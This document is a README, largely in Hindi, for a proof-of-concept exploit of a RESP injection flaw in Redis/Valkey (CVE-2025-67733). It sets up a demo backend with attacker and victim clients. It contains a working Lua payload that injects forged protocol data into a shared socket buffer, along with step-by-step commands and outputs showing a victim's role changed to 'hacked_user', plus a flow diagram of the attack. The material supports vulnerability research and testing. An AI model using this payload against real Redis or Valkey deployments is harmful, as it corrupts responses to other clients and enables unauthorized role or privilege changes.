
Redis/Valkey RESP इंजेक्शन PoC (CVE-2025-67733)
| Method | Endpoint | Description |
|---|
| POST | /api/user/role | उपयोगकर्ता भूमिका सेट करें |
| GET | /api/user/role | उपयोगकर्ता भूमिका प्राप्त करें |
| POST | /api/process | Lua स्क्रिप्ट निष्पादित करें |
उपयोग:
python backend.py <Valkey host> <Valkey port> [password]
# Examples
python backend.py 127.0.0.1 6379
python backend.py 127.0.0.1 6379 mypassword
Lua स्क्रिप्ट त्रुटि संदेश के माध्यम से सॉकेट बफर में दुर्भावनापूर्ण RESP डेटा इंजेक्ट करता है।
पेलोड:
error(redis.error_reply("INJECTED\r\n$11\r\nhacked_user"))
उपयोग:
python attacker_client.py
उपयोगकर्ता भूमिकाओं को सेट और प्राप्त करने वाला वैध क्लाइंट।
उपयोग:
python victim_client.py set # Set role to "normal_user"
python victim_client.py get # Get current role
pip install flask requests
टर्मिनल 1 - बैकएंड प्रारंभ करें:
python backend.py 127.0.0.1 6379
टर्मिनल 2 - भूमिका सेट करें:
python victim_client.py set
# Output: 'role':'normal_user' has been set.
python victim_client.py get
# Output: 'role':'normal_user'
टर्मिनल 3 - हमला:
python attacker_client.py
# Output: Socket poisoning successful
टर्मिनल 2 - भूमिका प्राप्त करें (हमले के बाद):
python victim_client.py get
# Output: 'role':'hacked_user'
1. Victim sets role
victim_client.py set --> backend --> Valkey
SET user:user:role "normal_user"
2. Attacker injects payload
attacker_client.py --> backend --> Valkey
EVAL 'error(...)' 0
Backend reads: "-ERR INJECTED\r\n"
Buffer remains: "$11\r\nhacked_user"
3. Victim gets role
victim_client.py get --> backend --> Valkey
GET user:user:role
Backend reads from buffer: "$11\r\nhacked_user"
Victim receives: "hacked_user"